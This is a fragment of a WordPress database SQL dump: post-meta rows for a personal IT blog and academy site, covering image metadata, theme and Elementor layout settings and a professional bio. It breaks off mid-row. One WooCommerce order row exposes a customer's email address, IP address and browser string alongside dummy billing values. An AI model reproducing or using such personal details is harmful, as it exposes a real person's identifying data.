(2241,592,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:700;s:4:\"file\";s:20:\"2021/12/banner01.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"banner01-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"banner01-1024x700.png\";s:5:\"width\";i:1024;s:6:\"height\";i:700;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"banner01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"banner01-768x700.png\";s:5:\"width\";i:768;s:6:\"height\";i:700;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"banner01-1536x672.png\";s:5:\"width\";i:1536;s:6:\"height\";i:672;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"banner01-280x180.png\";s:5:\"width\";i:280;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2242,592,'_wp_attachment_image_alt','http://nikoo-academy.com'),
(2302,603,'_edit_lock','1682957358:2'),
(2304,603,'_format_quote_source_url',''),
(2305,603,'_format_quote_source_name',''),
(2306,603,'_format_audio_embed',''),
(2307,603,'_format_video_embed',''),
(2308,603,'_edit_last','2'),
(2310,603,'page_layout','default'),
(2311,603,'page_sidebar_style','default'),
(2312,603,'show_content_top_margin','default'),
(2313,603,'auxin_featured_color_enabled','0'),
(2314,603,'auxin_featured_color','#1bb0ce'),
(2315,603,'aux_post_title_show','default'),
(2316,603,'page_content_title_alignment','default'),
(2317,603,'aux_post_info_show','default'),
(2318,603,'post_content_style','default'),
(2319,603,'blog_single_show_media','default'),
(2320,603,'blog_archive_show_featured_image','default'),
(2321,603,'aux_title_bar_show','default'),
(2322,603,'subtitle_position','before'),
(2323,603,'aux_title_bar_preset','default'),
(2324,603,'aux_title_bar_enable_customize','0'),
(2325,603,'aux_title_bar_content_width_type','boxed'),
(2326,603,'aux_title_bar_content_section_height','auto'),
(2327,603,'aux_title_bar_title_show','1'),
(2328,603,'aux_title_bar_heading_bordered','0'),
(2329,603,'aux_title_bar_heading_boxed','0'),
(2330,603,'aux_title_bar_meta_enabled','0'),
(2331,603,'aux_title_bar_bread_enabled','1'),
(2332,603,'aux_title_bar_bread_bordered','0'),
(2333,603,'aux_title_bar_text_align','left'),
(2334,603,'aux_title_bar_overlay_pattern','none'),
(2335,603,'aux_title_bar_overlay_pattern_opacity','0.15'),
(2336,603,'aux_title_bar_color_style','dark'),
(2337,603,'aux_title_bar_bg_show','0'),
(2338,603,'aux_title_bar_bg_parallax','0'),
(2339,603,'aux_title_bar_bg_size','cover'),
(2340,603,'_format_video_player_skin','default'),
(2341,603,'_format_audio_player_skin','default'),
(2342,603,'aux_custom_bg_show','0'),
(2343,603,'aux_custom_bg_repeat','repeat'),
(2344,603,'aux_custom_bg_attach','scroll'),
(2345,603,'aux_custom_bg_position','left top'),
(2346,603,'aux_custom_bg_size','auto'),
(2347,603,'aux_metafields_custom_styles',''),
(2357,607,'_order_key','wc_order_OhaAwrebIpUzc'),
(2358,607,'_customer_user','2'),
(2359,607,'_payment_method','bankmellat'),
(2360,607,'_payment_method_title','بانک ملت'),
(2361,607,'_customer_ip_address','5.236.156.32'),
(2362,607,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),
(2363,607,'_created_via','checkout'),
(2364,607,'_cart_hash','d5dc4c86aa11fc6328970f6e8c7306b1'),
(2365,607,'_billing_first_name','سس'),
(2366,607,'_billing_last_name','سسس'),
(2367,607,'_billing_company','شسیشسی'),
(2368,607,'_billing_address_1','شسیشسیشسی'),
(2369,607,'_billing_city','تهران'),
(2370,607,'_billing_state','THR'),
(2371,607,'_billing_postcode','123'),
(2372,607,'_billing_country','IR'),
(2373,607,'_billing_email','masoud.nikoofar@gmail.com'),
(2374,607,'_billing_phone','123123'),
(2375,607,'_order_currency','IRR'),
(2376,607,'_cart_discount','0'),
(2377,607,'_cart_discount_tax','0'),
(2378,607,'_order_shipping','0'),
(2379,607,'_order_shipping_tax','0'),
(2380,607,'_order_tax','0'),
(2381,607,'_order_total','4000.00'),
(2382,607,'_order_version','6.2.0'),
(2383,607,'_prices_include_tax','no'),
(2384,607,'_billing_address_index','سس سسس شسیشسی شسیشسیشسی تهران THR 123 IR masoud.nikoofar@gmail.com 123123'),
(2385,607,'_shipping_address_index',' '),
(2386,607,'is_vat_exempt','no'),
(2404,104,'_format_quote_source_url',''),
(2405,104,'_format_quote_source_name',''),
(2406,104,'_format_audio_embed',''),
(2407,104,'_format_video_embed',''),
(2408,104,'page_layout','default'),
(2409,104,'page_sidebar_style','default'),
(2410,104,'show_content_top_margin','default'),
(2411,104,'auxin_featured_color_enabled','0'),
(2412,104,'auxin_featured_color','#1bb0ce'),
(2413,104,'aux_post_title_show','default'),
(2414,104,'page_content_title_alignment','default'),
(2415,104,'aux_post_info_show','default'),
(2416,104,'post_content_style','default'),
(2417,104,'blog_single_show_media','default'),
(2418,104,'blog_archive_show_featured_image','default'),
(2419,104,'aux_title_bar_show','default'),
(2420,104,'subtitle_position','before'),
(2421,104,'aux_title_bar_preset','default'),
(2422,104,'aux_title_bar_enable_customize','0'),
(2423,104,'aux_title_bar_content_width_type','boxed'),
(2424,104,'aux_title_bar_content_section_height','auto'),
(2425,104,'aux_title_bar_title_show','1'),
(2426,104,'aux_title_bar_heading_bordered','0'),
(2427,104,'aux_title_bar_heading_boxed','0'),
(2428,104,'aux_title_bar_meta_enabled','0'),
(2429,104,'aux_title_bar_bread_enabled','1'),
(2430,104,'aux_title_bar_bread_bordered','0'),
(2431,104,'aux_title_bar_text_align','left'),
(2432,104,'aux_title_bar_overlay_pattern','none'),
(2433,104,'aux_title_bar_overlay_pattern_opacity','0.15'),
(2434,104,'aux_title_bar_color_style','dark'),
(2435,104,'aux_title_bar_bg_show','0'),
(2436,104,'aux_title_bar_bg_parallax','0'),
(2437,104,'aux_title_bar_bg_size','cover'),
(2438,104,'_format_video_player_skin','default'),
(2439,104,'_format_audio_player_skin','default'),
(2440,104,'aux_custom_bg_show','0'),
(2441,104,'aux_custom_bg_repeat','repeat'),
(2442,104,'aux_custom_bg_attach','scroll'),
(2443,104,'aux_custom_bg_position','left top'),
(2444,104,'aux_custom_bg_size','auto'),
(2445,104,'aux_metafields_custom_styles',''),
(2447,615,'_edit_lock','1682957185:2'),
(2452,615,'_format_quote_source_url',''),
(2453,615,'_format_quote_source_name',''),
(2454,615,'_format_audio_embed',''),
(2455,615,'_format_video_embed',''),
(2456,615,'_edit_last','2'),
(2457,615,'page_layout','default'),
(2458,615,'page_sidebar_style','default'),
(2459,615,'show_content_top_margin','default'),
(2460,615,'auxin_featured_color_enabled','0'),
(2461,615,'auxin_featured_color','#1bb0ce'),
(2462,615,'aux_post_title_show','default'),
(2463,615,'page_content_title_alignment','default'),
(2464,615,'aux_post_info_show','default'),
(2465,615,'post_content_style','default'),
(2466,615,'blog_single_show_media','default'),
(2467,615,'blog_archive_show_featured_image','default'),
(2468,615,'aux_title_bar_show','default'),
(2469,615,'subtitle_position','before'),
(2470,615,'aux_title_bar_preset','default'),
(2471,615,'aux_title_bar_enable_customize','0'),
(2472,615,'aux_title_bar_content_width_type','boxed'),
(2473,615,'aux_title_bar_content_section_height','auto'),
(2474,615,'aux_title_bar_title_show','1'),
(2475,615,'aux_title_bar_heading_bordered','0'),
(2476,615,'aux_title_bar_heading_boxed','0'),
(2477,615,'aux_title_bar_meta_enabled','0'),
(2478,615,'aux_title_bar_bread_enabled','1'),
(2479,615,'aux_title_bar_bread_bordered','0'),
(2480,615,'aux_title_bar_text_align','left'),
(2481,615,'aux_title_bar_overlay_pattern','none'),
(2482,615,'aux_title_bar_overlay_pattern_opacity','0.15'),
(2483,615,'aux_title_bar_color_style','dark'),
(2484,615,'aux_title_bar_bg_show','0'),
(2485,615,'aux_title_bar_bg_parallax','0'),
(2486,615,'aux_title_bar_bg_size','cover'),
(2487,615,'_format_video_player_skin','default'),
(2488,615,'_format_audio_player_skin','default'),
(2489,615,'aux_custom_bg_show','0'),
(2490,615,'aux_custom_bg_repeat','repeat'),
(2491,615,'aux_custom_bg_attach','scroll'),
(2492,615,'aux_custom_bg_position','left top'),
(2493,615,'aux_custom_bg_size','auto'),
(2494,615,'aux_metafields_custom_styles',''),
(2496,621,'_wp_attached_file','2022/12/HAProxy-High-Availability.png'),
(2497,621,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:682;s:6:\"height\";i:407;s:4:\"file\";s:37:\"2022/12/HAProxy-High-Availability.png\";s:8:\"filesize\";i:49839;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"HAProxy-High-Availability-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33003;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"HAProxy-High-Availability-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11985;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"HAProxy-High-Availability-280x180.png\";s:5:\"width\";i:280;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25256;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:37:\"HAProxy-High-Availability-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33003;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:37:\"HAProxy-High-Availability-600x358.png\";s:5:\"width\";i:600;s:6:\"height\";i:358;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:68207;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:37:\"HAProxy-High-Availability-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6421;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2498,615,'_wp_page_template','default'),
(2499,603,'_wp_page_template','default'),
(2501,56,'_format_quote_source_url',''),
(2502,56,'_format_quote_source_name',''),
(2503,56,'_format_audio_embed',''),
(2504,56,'_format_video_embed',''),
(2505,56,'_edit_last','2'),
(2506,56,'page_layout','default'),
(2507,56,'page_sidebar_style','default'),
(2508,56,'show_content_top_margin','default'),
(2509,56,'auxin_featured_color_enabled','0'),
(2510,56,'auxin_featured_color','#1bb0ce'),
(2511,56,'aux_post_title_show','default'),
(2512,56,'page_content_title_alignment','default'),
(2513,56,'aux_post_info_show','default'),
(2514,56,'post_content_style','default'),
(2515,56,'blog_single_show_media','default'),
(2516,56,'blog_archive_show_featured_image','default'),
(2517,56,'aux_title_bar_show','default'),
(2518,56,'subtitle_position','before'),
(2519,56,'aux_title_bar_preset','default'),
(2520,56,'aux_title_bar_enable_customize','0'),
(2521,56,'aux_title_bar_content_width_type','boxed'),
(2522,56,'aux_title_bar_content_section_height','auto'),
(2523,56,'aux_title_bar_title_show','1'),
(2524,56,'aux_title_bar_heading_bordered','0'),
(2525,56,'aux_title_bar_heading_boxed','0'),
(2526,56,'aux_title_bar_meta_enabled','0'),
(2527,56,'aux_title_bar_bread_enabled','1'),
(2528,56,'aux_title_bar_bread_bordered','0'),
(2529,56,'aux_title_bar_text_align','left'),
(2530,56,'aux_title_bar_overlay_pattern','none'),
(2531,56,'aux_title_bar_overlay_pattern_opacity','0.15'),
(2532,56,'aux_title_bar_color_style','dark'),
(2533,56,'aux_title_bar_bg_show','0'),
(2534,56,'aux_title_bar_bg_parallax','0'),
(2535,56,'aux_title_bar_bg_size','cover'),
(2536,56,'_format_video_player_skin','default'),
(2537,56,'_format_audio_player_skin','default'),
(2538,56,'aux_custom_bg_show','0'),
(2539,56,'aux_custom_bg_repeat','repeat'),
(2540,56,'aux_custom_bg_attach','scroll'),
(2541,56,'aux_custom_bg_position','left top'),
(2542,56,'aux_custom_bg_size','auto'),
(2543,56,'aux_metafields_custom_styles',''),
(2559,630,'_edit_lock','1713012566:2'),
(2560,630,'_edit_last','2'),
(2561,630,'page_footer_attribution','default'),
(2562,630,'page_footer_is_sticky','default'),
(2563,630,'page_elementor_header_template','388'),
(2564,630,'page_header_use_legacy','default'),
(2565,630,'page_overlay_header','default'),
(2566,630,'page_header_top_sticky','default'),
(2567,630,'aux_page_template_content_location','above-in-frame'),
(2568,630,'page_elementor_footer_template','358'),
(2569,630,'page_footer_use_legacy','default'),
(2570,630,'page_header_section_use_legacy','default'),
(2571,630,'page_header_menu','default'),
(2572,630,'display_page_header_cover','0'),
(2573,630,'page_header_navigation_layout','default'),
(2574,630,'page_header_width','default'),
(2575,630,'page_header_search_button','default'),
(2576,630,'page_header_logo_display','default'),
(2577,630,'page_header_border_bottom','default'),
(2578,630,'page_header_animation','default'),
(2579,630,'page_header_color_scheme','default'),
(2580,630,'page_header_sticky_color_scheme','default'),
(2581,630,'page_header_logo_can_scale','default'),
(2582,630,'page_vertical_header_items_align','default'),
(2583,630,'page_vertical_menu_footer_display','default'),
(2584,630,'page_vertical_header_search_border','default'),
(2585,630,'page_header_social_icons','default'),
(2586,630,'page_header_social_icons_size','default'),
(2587,630,'page_top_header_section_use_legacy','default'),
(2588,630,'aux_show_topheader','default'),
(2589,630,'aux_topheader_layout','default'),
(2590,630,'aux_show_topheader_message','default'),
(2591,630,'aux_show_topheader_secondary_message','default'),
(2592,630,'page_general_footer_section_use_legacy','default'),
(2593,630,'page_show_footer','default'),
(2594,630,'page_footer_components_layout','default'),
(2595,630,'page_show_subfooter','default'),
(2596,630,'content_layout','default'),
(2597,630,'page_layout','default'),
(2598,630,'page_sidebar_style','default'),
(2599,630,'show_content_top_margin','default'),
(2600,630,'page_show_goto_top_btn','default'),
(2601,630,'page_goto_top_alignment','default'),
(2602,630,'aux_title_bar_show','default'),
(2603,630,'subtitle_position','before'),
(2604,630,'aux_title_bar_preset','default'),
(2605,630,'aux_title_bar_enable_customize','0'),
(2606,630,'aux_title_bar_content_width_type','boxed'),
(2607,630,'aux_title_bar_content_section_height','auto'),
(2608,630,'aux_title_bar_title_show','1'),
(2609,630,'aux_title_bar_heading_bordered','0'),
(2610,630,'aux_title_bar_heading_boxed','0'),
(2611,630,'aux_title_bar_meta_enabled','0'),
(2612,630,'aux_title_bar_bread_enabled','1'),
(2613,630,'aux_title_bar_bread_bordered','0'),
(2614,630,'aux_title_bar_text_align','left'),
(2615,630,'aux_title_bar_overlay_pattern','none'),
(2616,630,'aux_title_bar_overlay_pattern_opacity','0.15'),
(2617,630,'aux_title_bar_color_style','dark'),
(2618,630,'aux_title_bar_bg_show','0'),
(2619,630,'aux_title_bar_bg_parallax','0'),
(2620,630,'aux_title_bar_bg_size','cover'),
(2621,630,'aux_custom_bg_show','0'),
(2622,630,'aux_custom_bg_repeat','repeat'),
(2623,630,'aux_custom_bg_attach','scroll'),
(2624,630,'_elementor_edit_mode','builder'),
(2625,630,'aux_custom_bg_position','left top'),
(2626,630,'aux_custom_bg_size','auto'),
(2627,630,'top_slider_id','none'),
(2628,630,'aux_metafields_custom_styles',''),
(2629,630,'_elementor_template_type','wp-page'),
(2630,630,'_elementor_version','3.12.2'),
(2631,630,'_elementor_pro_version','3.12.3'),
(2632,632,'_elementor_edit_mode','builder'),
(2633,632,'_elementor_template_type','wp-page'),
(2634,632,'_elementor_version','3.8.1'),
(2635,632,'_elementor_pro_version','3.5.1'),
(2636,633,'_elementor_edit_mode','builder'),
(2637,633,'_elementor_template_type','wp-page'),
(2638,633,'_elementor_version','3.8.1'),
(2639,633,'_elementor_pro_version','3.5.1'),
(2640,630,'_wp_page_template','default'),
(2641,630,'_elementor_data','[{\"id\":\"056e6f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"eb90375\",\"elType\":\"widget\",\"settings\":{\"title\":\"Database Related posts\",\"align\":\"center\",\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=text\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(2642,634,'_elementor_edit_mode','builder'),
(2643,634,'_elementor_template_type','wp-page'),
(2644,634,'_elementor_version','3.8.1'),
(2645,634,'_elementor_pro_version','3.5.1'),
(2646,634,'_wp_page_template','default'),
(2647,634,'_elementor_data','[{\"id\":\"0b85431\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4caea37\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b1b1580\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"none\",\"classic_show_excerpt\":\"\",\"classic_meta_data\":[],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_row_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"classic_alignment\":\"left\",\"classic_title_color\":\"#FFFFFF\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),
(2649,635,'_elementor_edit_mode','builder'),
(2650,635,'_elementor_template_type','wp-page'),
(2651,635,'_elementor_version','3.8.1'),
(2652,635,'_elementor_pro_version','3.5.1'),
(2653,635,'_wp_page_template','default'),
(2654,635,'_elementor_data','[{\"id\":\"0b85431\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4caea37\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b1b1580\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"none\",\"classic_show_excerpt\":\"\",\"classic_meta_data\":[],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_row_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"classic_alignment\":\"left\",\"classic_title_color\":\"#FFFFFF\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),
(2656,636,'_elementor_edit_mode','builder'),
(2657,636,'_elementor_template_type','wp-page'),
(2658,636,'_elementor_version','3.8.1'),
(2659,636,'_elementor_pro_version','3.5.1'),
(2660,636,'_wp_page_template','default'),
(2661,636,'_elementor_data','[{\"id\":\"0b85431\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4caea37\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b1b1580\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"none\",\"classic_show_excerpt\":\"\",\"classic_meta_data\":[],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_row_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"classic_alignment\":\"left\",\"classic_title_color\":\"#FFFFFF\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),
(2663,637,'_elementor_edit_mode','builder'),
(2664,637,'_elementor_template_type','wp-page'),
(2665,637,'_elementor_version','3.8.1'),
(2666,637,'_elementor_pro_version','3.5.1'),
(2667,637,'_wp_page_template','default'),
(2668,637,'_elementor_data','[{\"id\":\"0b85431\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4caea37\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b1b1580\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"none\",\"classic_show_excerpt\":\"\",\"classic_meta_data\":[],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_row_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"classic_alignment\":\"left\",\"classic_title_color\":\"#FFFFFF\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),
(2721,647,'_edit_lock','1758639587:1'),
(2722,647,'_elementor_edit_mode','builder'),
(2723,647,'_edit_last','2'),
(2724,647,'content_layout','default'),
(2725,647,'page_layout','default'),
(2726,647,'page_sidebar_style','default'),
(2727,647,'show_content_top_margin','default'),
(2728,647,'page_show_goto_top_btn','default'),
(2729,647,'page_goto_top_alignment','default'),
(2730,647,'aux_title_bar_show','default'),
(2731,647,'aux_title_bar_preset','default'),
(2732,647,'aux_title_bar_enable_customize','0'),
(2733,647,'aux_title_bar_content_width_type','boxed'),
(2734,647,'aux_title_bar_content_section_height','auto'),
(2735,647,'aux_title_bar_title_show','1'),
(2736,647,'aux_title_bar_heading_bordered','0'),
(2737,647,'aux_title_bar_heading_boxed','0'),
(2738,647,'aux_title_bar_meta_enabled','0'),
(2739,647,'_elementor_template_type','wp-page'),
(2740,647,'aux_title_bar_bread_enabled','1'),
(2741,647,'_elementor_version','3.28.3'),
(2742,647,'aux_title_bar_bread_bordered','0'),
(2743,647,'aux_title_bar_text_align','left'),
(2744,647,'aux_title_bar_overlay_pattern','none'),
(2745,647,'aux_title_bar_overlay_pattern_opacity','0.15'),
(2746,647,'aux_title_bar_color_style','dark'),
(2747,647,'aux_title_bar_bg_show','0'),
(2748,647,'aux_title_bar_bg_parallax','0'),
(2749,647,'aux_title_bar_bg_size','cover'),
(2750,647,'aux_custom_bg_show','0'),
(2751,647,'aux_custom_bg_repeat','repeat'),
(2752,647,'aux_custom_bg_attach','scroll'),
(2753,647,'aux_custom_bg_position','left top'),
(2754,647,'aux_custom_bg_size','auto'),
(2755,647,'top_slider_id','none'),
(2756,647,'aux_metafields_custom_styles',''),
(2757,647,'_wp_page_template','default'),
(2758,647,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\"><span aria-hidden=\\\"true\\\">With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.<\\/span><\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"c86ec6e\",\"elType\":\"widget\",\"settings\":{\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_thumbnail_size_size\":\"thumbnail\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":20,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More 